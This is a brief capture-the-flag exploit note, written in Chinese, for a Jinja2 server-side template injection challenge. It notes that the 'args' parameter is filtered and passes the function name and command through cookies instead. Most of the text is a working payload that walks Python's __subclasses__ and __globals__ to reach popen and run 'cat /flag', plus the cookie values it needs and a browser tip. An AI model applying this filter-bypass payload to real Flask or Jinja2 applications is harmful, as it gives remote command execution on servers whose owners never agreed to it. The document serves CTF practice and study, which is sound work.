EXP
这道题过滤了args, args是用于get传参的,可以使用cookie代替,调用cookie 的属性是cookies
payload
name={{{}.__class__.__base__.__subclasses__()[132].__init__.__globals__[request.cookies.a](request.cookies.b).read()}}
cookie
a=popen;b=cat /flag
需要注意的时候edge上的hackbar似乎无法进行cookie传参,尽量还是用firefox罢了